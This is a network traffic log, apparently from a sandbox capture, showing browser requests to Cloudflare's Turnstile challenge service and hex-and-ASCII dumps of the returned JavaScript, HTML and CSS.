2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 39 5f 2d 5d 7b 30 2c 33 32 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 6d 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 6d 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b Data Ascii: 9_-]{0,32}$/i;function Je(e){return e===void 0?!0:typeof e=="string"&&vr.test(e)}var mr=/^[a-z0-9_\-=]{0,255}$/i;function Ze(e){return e===void 0?!0:typeof e=="string"&&mr.test(e)}function et(e){return N(["normal","compact","invisible"],e)}function tt(e){
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 62 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 5f 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c Data Ascii: ";return"".concat(b,"/cdn-cgi/challenge-platform/").concat(_,"turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(a,"/").concat(r.theme,"/").concat(r.size).concat(l)}function Le(e){if(e===void 0)throw new ReferenceError("this hasn't been initial
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 65 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 47 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 61 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 61 2e 67 65 74 28 6f 29 3b 61 2e 73 65 74 Data Ascii: e){var a=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null\|\|!Gt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof a!="undefined"){if(a.has(o))return a.get(o);a.set
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 4b 74 28 29 7b 76 61 72 20 65 3d 73 74 28 29 3b 65 7c 7c 70 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 61 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 61 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e Data Ascii: c.src))return c}function Kt(){var e=st();e\|\|p("Could not find Turnstile script tag, some features may not be available",43777);var a={loadedAsync:!1,params:new URLSearchParams};(e.async\|\|e.defer)&&(a.loadedAsync=!0);var r=e.src,o=r.split("?");return o.len
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 3f 53 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3f 68 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 38 30 70 78 22 3a 68 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 36 30 70 78 22 2c 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 68 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 68 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 Data Ascii: ?S:"nonexistent")?h.style.height="480px":h.style.height="460px",h.style.position="absolute",h.style.zIndex="21474836420",h.style.borderWidth="1px",h.style.borderColor="#000",h.style.borderStyle="solid",h.style.backgroundColor="#ffffff",h.style.borderRadiu
2024-07-03 07:40:35 UTC	1369	IN	Data Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 6c 69 6e 65 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c Data Ascii: ocument.createElementNS("http://www.w3.org/2000/svg","line");t.setAttribute("stroke-width","3"),t.setAttribute("stroke","#fff"),t.setAttribute("fill","none"),t.setAttribute("x1","6"),t.setAttribute("x2","18"),t.setAttribute("y1","18"),t.setAttribute("y2",

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:36 UTC	790	OUT	GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://vkwek.ckyucle.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:36 UTC	1362	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 79313 Connection: close critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin document-policy: js-profiling origin-agent-cluster: ?1 referrer-policy: same-origin cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cross-origin-resource-policy: cross-origin accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
2024-07-03 07:40:36 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 89d53a759ec80cb4-EWRalt-svc: h3=":443"; ma=86400
2024-07-03 07:40:36 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c Data Ascii: splay: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterl
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 2c 20 2e 74 68 65 6d 65 2d 64 61 72 Data Ascii: ext a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark .cb-lb input:focus ~ .cb-i, .theme-dar
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 Data Ascii: r: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.the
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 Data Ascii: #challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:v
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 Data Ascii: tion: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; bac
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 Data Ascii: top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { te
2024-07-03 07:40:36 UTC	1369	IN	Data Raw: 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 Data Ascii: er;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-compact #success-icon { left: 86px

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:36 UTC	710	OUT	GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:37 UTC	331	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:40:37 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 206658 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 89d53a7b9a9c42ea-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:37 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 4e 2c 66 54 2c 66 55 2c 67 6b 2c 67 6c 2c 67 70 2c 67 71 2c 67 75 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 67 2c 68 68 2c 68 69 2c 68 6a 2c 68 6b 2c 68 6c 2c 68 6d 2c 68 6e 2c 68 6f 2c 68 70 2c 68 71 2c 68 72 2c 68 74 2c 68 46 2c 68 53 2c Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fN,fT,fU,gk,gl,gp,gq,gu,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hg,hh,hi,hj,hk,hl,hm,hn,ho,hp,hq,hr,ht,hF,hS,
2024-07-03 07:40:37 UTC	1369	IN	Data Raw: 44 2c 45 2c 46 29 7b 69 66 28 6a 4c 3d 69 7a 2c 6f 3d 7b 27 74 66 4c 5a 45 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 58 55 45 69 74 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 54 4b 64 66 63 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 5e 47 7d 2c 27 52 76 4c 42 69 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 72 72 48 6a 54 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 44 56 57 44 55 27 3a 6a 4c 28 31 31 37 30 29 2c 27 6c 46 61 76 66 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 70 70 46 Data Ascii: D,E,F){if(jL=iz,o={'tfLZE':function(G,H){return G<H},'XUEit':function(G,H){return G+H},'TKdfc':function(G,H){return H^G},'RvLBi':function(G,H){return 